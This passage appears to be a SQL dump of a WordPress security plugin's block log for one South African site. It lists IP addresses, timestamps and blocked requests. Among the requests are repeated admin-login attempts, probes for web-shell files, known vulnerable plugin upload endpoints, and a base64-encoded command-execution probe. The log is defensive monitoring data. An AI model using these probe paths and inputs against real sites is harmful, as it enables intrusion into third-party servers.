22:05:54','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7118,'2022-07-07 23:14:48','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7119,'2022-07-07 23:17:40','20.9.7.169','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7120,'2022-07-08 01:20:59','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7121,'2022-07-08 03:52:52','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7122,'2022-07-08 04:13:44','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7123,'2022-07-08 07:00:07','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7124,'2022-07-08 07:14:06','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7125,'2022-07-08 08:58:05','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7126,'2022-07-08 09:00:49','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7127,'2022-07-08 12:25:38','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7128,'2022-07-08 14:48:11','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7129,'2022-07-08 15:28:24','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7130,'2022-07-08 16:59:17','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7131,'2022-07-08 17:24:06','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7132,'2022-07-08 17:30:13','194.38.20.161','https://smithandsmith.co.za/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','404shield',''),(7133,'2022-07-08 17:59:41','144.126.140.17','https://smithandsmith.co.za/wp-login.php','404shield',''),(7134,'2022-07-08 18:04:47','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7135,'2022-07-08 19:56:33','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7136,'2022-07-09 00:44:48','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7137,'2022-07-09 01:46:59','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7138,'2022-07-09 05:39:07','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7139,'2022-07-09 06:43:35','23.99.216.51','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7140,'2022-07-09 06:59:36','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7141,'2022-07-09 07:14:09','79.143.187.168','http://smithandsmith.co.za/contact/','httpbl',''),(7142,'2022-07-09 07:14:11','79.143.187.168','http://smithandsmith.co.za/','httpbl',''),(7143,'2022-07-09 07:14:13','79.143.187.168','http://smithandsmith.co.za/contact/','httpbl',''),(7144,'2022-07-09 08:50:14','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7145,'2022-07-09 09:33:57','52.165.132.224','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7146,'2022-07-09 09:34:28','52.165.132.224','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(7147,'2022-07-09 09:35:16','52.165.132.224','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(7148,'2022-07-09 10:38:57','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7149,'2022-07-09 10:55:19','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7150,'2022-07-09 12:44:25','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7151,'2022-07-09 16:34:48','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7152,'2022-07-09 17:23:20','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7153,'2022-07-09 17:40:27','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7154,'2022-07-09 18:51:11','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7155,'2022-07-09 19:36:20','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7156,'2022-07-09 23:44:36','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7157,'2022-07-10 00:21:20','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7158,'2022-07-10 02:30:16','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7159,'2022-07-10 03:11:07','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7160,'2022-07-10 03:17:50','78.47.98.223','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(7161,'2022-07-10 03:18:15','78.47.98.223','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7162,'2022-07-10 03:18:20','78.47.98.223','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(7163,'2022-07-10 04:10:02','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7164,'2022-07-10 04:36:12','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7165,'2022-07-10 04:56:18','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7166,'2022-07-10 05:05:04','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php','404shield',''),(7167,'2022-07-10 10:41:49','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7168,'2022-07-10 10:58:26','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7169,'2022-07-10 11:23:48','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7170,'2022-07-10 15:36:37','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7171,'2022-07-10 16:25:54','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7172,'2022-07-10 16:56:50','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7173,'2022-07-10 19:02:15','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7174,'2022-07-10 19:56:15','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7175,'2022-07-10 21:10:10','109.233.192.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(7176,'2022-07-10 21:39:24','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7177,'2022-07-11 01:18:51','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7178,'2022-07-11 02:32:23','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7179,'2022-07-11 02:48:25','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7180,'2022-07-11 03:52:59','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7181,'2022-07-11 04:17:25','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7182,'2022-07-11 04:19:02','185.14.97.176','http://smithandsmith.co.za/contact/','httpbl',''),(7183,'2022-07-11 04:19:03','185.14.97.176','http://smithandsmith.co.za/','httpbl',''),(7184,'2022-07-11 08:33:55','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7185,'2022-07-11 09:53:23','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7186,'2022-07-11 10:45:11','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7187,'2022-07-11 12:28:16','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7188,'2022-07-11 13:21:44','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7189,'2022-07-11 13:24:30','216.108.237.111','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7190,'2022-07-11 13:26:12','20.218.120.196','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7191,'2022-07-11 13:26:27','20.218.120.196','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7192,'2022-07-11 13:26:34','20.218.120.196','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7193,'2022-07-11 13:27:27','216.108.237.111','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7194,'2022-07-11 13:30:09','129.45.51.234','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7195,'2022-07-11 13:30:27','129.45.51.234','https://www.smithandsmith.co.za/wp-content/mu-plugins/db-safe-mode.php','404shield',''),(7196,'2022-07-11 13:32:23','129.45.51.234','https://www.smithandsmith.co.za/wp-content/themes/config.bak.php','404shield',''),(7197,'2022-07-11 15:20:30','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7198,'2022-07-11 16:55:30','54.39.45.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(7199,'2022-07-11 18:01:47','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7200,'2022-07-11 21:24:01','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7201,'2022-07-11 22:49:11','20.235.4.183','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7202,'2022-07-11 22:57:16','90.15.105.149','https://smithandsmith.co.za/wp-login.php','404shield',''),(7203,'2022-07-11 23:33:28','20.218.120.196','https://www.smithandsmith.co.za/wp-content/fw.php','404shield',''),(7204,'2022-07-11 23:33:29','20.218.120.196','https://www.smithandsmith.co.za/wp-content/y.php','404shield',''),(7205,'2022-07-11 23:33:29','20.218.120.196','https://www.smithandsmith.co.za/wp-content/1.php','404shield',''),(7206,'2022-07-12 00:19:27','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7207,'2022-07-12 01:30:08','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7208,'2022-07-12 04:35:37','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/lbg-bottom-playlist-videoplayer/js/uploadify/uploadify.css','404shield',''),(7209,'2022-07-12 04:41:24','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7210,'2022-07-12 05:00:42','20.235.4.183','https://smithandsmith.co.za/wp-content/wp-logins.php','404shield',''),(7211,'2022-07-12 05:00:45','20.235.4.183','https://smithandsmith.co.za/wp-content/wp-admin.php','404shield',''),(7212,'2022-07-12 05:00:45','20.235.4.183','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7213,'2022-07-12 05:10:08','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7214,'2022-07-12 08:52:14','217.138.219.182','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7215,'2022-07-12 10:29:51','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7216,'2022-07-12 10:36:52','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7217,'2022-07-12 11:08:14','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7218,'2022-07-12 13:16:25','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7219,'2022-07-12 13:19:09','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7220,'2022-07-12 14:30:34','23.88.63.223','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7221,'2022-07-12 19:16:46','185.183.122.143','https://smithandsmith.co.za/wp-login.php','404shield',''),(7222,'2022-07-12 21:20:37','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7223,'2022-07-12 21:46:12','196.244.192.226','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7224,'2022-07-12 21:46:40','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7225,'2022-07-12 21:48:07','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7226,'2022-07-12 21:53:14','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7227,'2022-07-12 22:35:54','40.117.210.97','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(7228,'2022-07-13 00:39:04','155.138.214.66','https://www.smithandsmith.co.za/wp-content/plugins/wp-diambar/includes/loadme.php','404shield',''),(7229,'2022-07-13 02:15:12','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7230,'2022-07-13 05:53:44','89.36.76.131','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7231,'2022-07-13 07:32:30','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7232,'2022-07-13 07:34:24','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7233,'2022-07-13 07:56:58','92.246.84.133','https://smithandsmith.co.za/contact/','httpbl',''),(7234,'2022-07-13 07:57:00','92.246.84.133','https://smithandsmith.co.za/','httpbl',''),(7235,'2022-07-13 08:05:41','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7236,'2022-07-13 08:33:11','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7237,'2022-07-13 09:17:20','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7238,'2022-07-13 13:17:19','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7239,'2022-07-13 13:48:11','20.45.181.14','https://www.smithandsmith.co.za/wp-content/alfacgiapi/perl.alfa','404shield',''),(7240,'2022-07-13 13:48:12','20.45.181.14','https://www.smithandsmith.co.za/wp-content/alfacgiapi/JANCOK.php','404shield',''),(7241,'2022-07-13 15:58:23','20.110.242.199','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7242,'2022-07-13 16:08:47','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7243,'2022-07-13 18:25:31','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7244,'2022-07-13 18:55:02','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7245,'2022-07-13 19:23:59','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7246,'2022-07-13 20:43:35','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7247,'2022-07-13 20:49:04','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7248,'2022-07-13 22:58:45','20.45.181.14','https://www.smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(7249,'2022-07-13 22:58:46','20.45.181.14','https://www.smithandsmith.co.za/wp-admin/xleet.php','404shield',''),(7250,'2022-07-13 22:58:46','20.45.181.14','https://www.smithandsmith.co.za/wp-content/fw.php','404shield',''),(7251,'2022-07-13 23:28:18','52.142.148.247','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7252,'2022-07-13 23:28:22','52.142.148.247','https://smithandsmith.co.za/wp-admin/css/colors/coffee/fw.php','404shield',''),(7253,'2022-07-13 23:28:26','52.142.148.247','https://smithandsmith.co.za/wp-admin/css/fw.php','404shield',''),(7254,'2022-07-14 00:14:47','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7255,'2022-07-14 01:31:00','20.45.181.14','https://www.smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(7256,'2022-07-14 01:31:01','20.45.181.14','https://www.smithandsmith.co.za/wp-admin/xleet.php','404shield',''),(7257,'2022-07-14 01:31:03','20.45.181.14','https://www.smithandsmith.co.za/wp-content/fw.php','404shield',''),(7258,'2022-07-14 04:02:00','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7259,'2022-07-14 05:15:13','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7260,'2022-07-14 05:39:36','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7261,'2022-07-14 06:09:15','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7262,'2022-07-14 08:58:32','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7263,'2022-07-14 09:14:05','52.159.119.147','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7264,'2022-07-14 09:14:30','52.159.119.147','https://www.smithandsmith.co.za//wp-content/kk.php','404shield',''),(7265,'2022-07-14 09:27:55','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7266,'2022-07-14 11:40:37','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7267,'2022-07-14 16:10:37','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7268,'2022-07-14 16:15:24','20.235.4.183','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7269,'2022-07-14 16:28:21','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7270,'2022-07-14 18:08:16','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7271,'2022-07-14 19:43:14','20.110.242.199','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7272,'2022-07-14 20:30:48','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7273,'2022-07-14 20:50:48','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7274,'2022-07-15 02:22:34','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7275,'2022-07-15 02:40:48','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7276,'2022-07-15 03:00:18','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7277,'2022-07-15 03:08:46','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7278,'2022-07-15 04:43:21','5.161.98.209','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(7279,'2022-07-15 04:44:10','5.161.98.209','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7280,'2022-07-15 04:44:16','5.161.98.209','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(7281,'2022-07-15 05:08:49','95.214.54.101','http://smithandsmith.co.za/contact/','httpbl',''),(7282,'2022-07-15 05:08:50','95.214.54.101','http://smithandsmith.co.za/','httpbl',''),(7283,'2022-07-15 05:08:51','185.129.62.63','http://smithandsmith.co.za/contact/','httpbl',''),(7284,'2022-07-15 05:08:52','185.129.62.63','http://smithandsmith.co.za/','httpbl',''),(7285,'2022-07-15 05:28:21','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7286,'2022-07-15 07:12:59','107.150.46.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(7287,'2022-07-15 07:13:44','107.150.46.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(7288,'2022-07-15 07:14:33','107.150.46.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(7289,'2022-07-15 07:57:26','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7290,'2022-07-15 08:00:40','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7291,'2022-07-15 11:12:24','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7292,'2022-07-15 13:47:25','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7293,'2022-07-15 13:47:27','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7294,'2022-07-15 14:19:47','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7295,'2022-07-15 14:45:16','173.208.234.154','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(7296,'2022-07-15 14:45:31','173.208.234.154','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(7297,'2022-07-15 14:45:40','173.208.234.154','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7298,'2022-07-15 18:59:07','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7299,'2022-07-15 19:25:45','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7300,'2022-07-15 20:58:03','159.203.31.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7301,'2022-07-15 22:30:29','3.133.130.30','https://smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','404shield',''),(7302,'2022-07-15 22:30:36','3.133.130.30','https://smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/a57bze8931.php','404shield',''),(7303,'2022-07-15 22:30:38','3.133.130.30','https://smithandsmith.co.za//wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','404shield',''),(7304,'2022-07-15 22:54:53','116.203.154.251','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(7305,'2022-07-15 22:55:50','116.203.154.251','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7306,'2022-07-15 22:56:03','116.203.154.251','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(7307,'2022-07-15 23:18:05','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7308,'2022-07-16 00:35:52','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7309,'2022-07-16 00:35:54','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7310,'2022-07-16 02:54:53','20.235.4.183','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7311,'2022-07-16 03:50:47','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7312,'2022-07-16 04:44:18','81.17.18.62','http://smithandsmith.co.za/contact/','httpbl',''),(7313,'2022-07-16 04:44:19','81.17.18.62','http://smithandsmith.co.za/','httpbl',''),(7314,'2022-07-16 04:44:22','109.70.100.32','http://smithandsmith.co.za/contact/','httpbl',''),(7315,'2022-07-16 04:44:22','109.70.100.32','http://smithandsmith.co.za/','httpbl',''),(7316,'2022-07-16 06:00:27','20.219.8.7','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7317,'2022-07-16 06:05:53','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7318,'2022-07-16 07:17:08','185.254.94.237','https://smithandsmith.co.za/wp-content/uploads/wp-stream.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=ZWNobyA0MDk3MjMqMjA7','404shield',''),(7319,'2022-07-16 07:17:08','185.254.94.237','https://smithandsmith.co.za/wp-content/uploads/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=ZWNobyA0MDk3MjMqMjA7','404shield',''),(7320,'2022-07-16 07:17:08','185.254.94.237','https://smithandsmith.co.za/wp-content/uploads/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=ZWNobyA0MDk3MjMqMjA7','404shield',''),(7321,'2022-07-16 08:15:31','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7322,'2022-07-16 10:52:13','20.235.4.183','https://www.smithandsmith.co.za/wp-content/wp-logins.php','404shield',''),(7323,'2022-07-16 10:52:19','20.235.4.183','https://www.smithandsmith.co.za/wp-content/wp-admin.php','404shield',''),(7324,'2022-07-16 10:52:20','20.235.4.183','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7325,'2022-07-16 10:53:49','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7326,'2022-07-16 11:45:39','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7327,'2022-07-16 11:45:40','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7328,'2022-07-16 12:16:06','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7329,'2022-07-16 13:07:46','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/contus-hd-flv-player/uploadVideo.php','404shield',''),(7330,'2022-07-16 16:49:16','118.69.173.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(7331,'2022-07-16 17:05:51','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7332,'2022-07-16 17:24:28','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7333,'2022-07-16 19:36:05','92.204.145.239','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7334,'2022-07-16 20:47:36','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7335,'2022-07-16 22:21:53','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7336,'2022-07-16 23:05:45','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7337,'2022-07-16 23:05:49','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7338,'2022-07-17 00:47:00','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7339,'2022-07-17 01:53:08','185.220.101.5','http://smithandsmith.co.za/contact/','httpbl',''),(7340,'2022-07-17 01:53:09','185.220.101.5','http://smithandsmith.co.za/','httpbl',''),(7341,'2022-07-17 02:00:34','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7342,'2022-07-17 04:32:23','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7343,'2022-07-17 04:59:14','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7344,'2022-07-17 09:48:41','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7345,'2022-07-17 10:20:52','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7346,'2022-07-17 10:20:59','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7347,'2022-07-17 13:30:23','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7348,'2022-07-17 15:03:49','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7349,'2022-07-17 15:24:51','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7350,'2022-07-17 18:21:22','35.225.163.183','http://smithandsmith.co.za/','httpbl',''),(7351,'2022-07-17 19:10:31','94.158.219.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(7352,'2022-07-17 20:46:22','92.204.145.239','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(7353,'2022-07-17 20:46:23','92.204.145.239','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(7354,'2022-07-17 20:46:24','92.204.145.239','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(7355,'2022-07-17 21:09:26','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7356,'2022-07-17 21:28:52','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7357,'2022-07-17 21:53:17','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7358,'2022-07-18 00:02:11','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7359,'2022-07-18 01:03:40','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7360,'2022-07-18 01:18:03','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/contus-video-galleryversion-10/upload1.php','404shield',''),(7361,'2022-07-18 02:21:20','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7362,'2022-07-18 04:07:47','193.151.180.35','https://smithandsmith.co.za/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','404shield',''),(7363,'2022-07-18 04:07:59','193.151.180.35','https://smithandsmith.co.za/wp-content/plugins/ioptimizations/bala.php','404shield',''),(7364,'2022-07-18 04:08:06','193.151.180.35','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(7365,'2022-07-18 06:24:32','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7366,'2022-07-18 07:28:28','40.69.123.207','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7367,'2022-07-18 08:14:17','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7368,'2022-07-18 08:25:36','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7369,'2022-07-18 08:41:28','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7370,'2022-07-18 08:55:26','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7371,'2022-07-18 13:18:56','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7372,'2022-07-18 14:50:41','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7373,'2022-07-18 16:59:05','91.208.99.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(7374,'2022-07-18 18:08:09','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7375,'2022-07-18 19:34:29','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7376,'2022-07-18 19:41:55','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7377,'2022-07-18 20:00:12','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7378,'2022-07-18 23:12:36','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7379,'2022-07-19 00:13:52','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7380,'2022-07-19 01:55:36','212.237.123.52','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7381,'2022-07-19 02:59:31','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7382,'2022-07-19 